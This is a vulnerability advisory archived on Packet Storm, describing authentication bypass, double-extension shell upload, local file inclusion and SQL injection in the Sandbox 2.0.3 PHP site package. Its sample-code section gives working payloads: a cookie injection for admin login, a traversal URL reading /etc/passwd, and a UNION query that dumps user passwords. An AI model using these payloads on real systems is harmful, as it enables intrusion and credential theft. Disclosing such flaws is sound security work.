exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sandbox 2.0.3 Bypass / Local File Inclusion / Shell Upload / SQL Injection

Sandbox 2.0.3 Bypass / Local File Inclusion / Shell Upload / SQL Injection
Posted Jul 7, 2010
Authored by Salvatore Fresta

Sandbox version 2.0.3 suffers from bypass, local file inclusion, shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, local, vulnerability, sql injection, file inclusion
SHA-256 | 78e1b310611c60f957726764ec989af46f7ebb6e8fbf676a4a1023c0d8c6f4c5

Sandbox 2.0.3 Bypass / Local File Inclusion / Shell Upload / SQL Injection

Change Mirror Download
Sandbox 2.0.3 Multiple Remote Vulnerabilities

Name Sandbox
Vendor http://www.iguanadons.net
Versions Affected 2.0.3

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-07

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Sandbox is a personal website package that provides you
with a blog, image gallery, file downloads area, and the
ability to create miscellaneous custom webpages.


II. DESCRIPTION
_______________

Some parameters are not sanitised before being used in
SQL queries and in danger PHP's functions.
The vulnerabilities are reported in version 2.0.3. Other
versions may also be affected.


III. ANALYSIS
_____________

Summary:

A) Authentication Bypass
B) Arbitrary File Upload
C) Local File Inclusion
D) SQL Injection


A) Authentication Bypass
________________________

The sandbox_pass's cookie value in global.php is not
properly sanitised before being used in a SQL query.
Since this value is used for the authentication
system, the injection can be used to bypass it.
Successful exploitation requires that "magic_quotes_gpc"
is disabled.


B) Arbitrary File Upload
________________________

When a file is sent to blog.php (and also to profile.php)
a bad check for extension is did. The check consists in
dividing the file's name in substrings delimited by a
point and checking if the second substring's value is
present in the white list. This method works fine for a
file with a single extension, but if an attacker uses a
file with a double extension, this method doesn't work
well. The following is the affected code in blog.php:

$fname = $this->files['image_file']['tmp_name'];
$system = explode( '.', $this->files['image_file']['name'] );
$system[1] = strtolower($system[1]);

if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
NO UPLOAD
} else {
UPLOAD
}

If the file's name is evil.jpg.php: $system[1] = jpg


C) Local File Inclusion
_______________________

The a parameter in admin.php is not properly sanitised
before being used in the require() PHP's function.
This can be exploited to include arbitrary files from
local resources via directory traversal attacks and
URL-encoded NULL bytes.


D) SQL Injection
________________

The p parameter in modules/page.php is not properly
sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Authentication Bypass

cookie: sandbox_pass = 1' OR '1'='1'#
cookie: sandbox_user = userid (1 for admin)


B) Arbitrary File Upload

Upload a file with a double extension.


C) Local File Inclusion

http://site/path/admin.php?a=../../../../../../../etc/passwd%00


D) SQL Injection

http://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users


V. FIX
______

No fix.

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close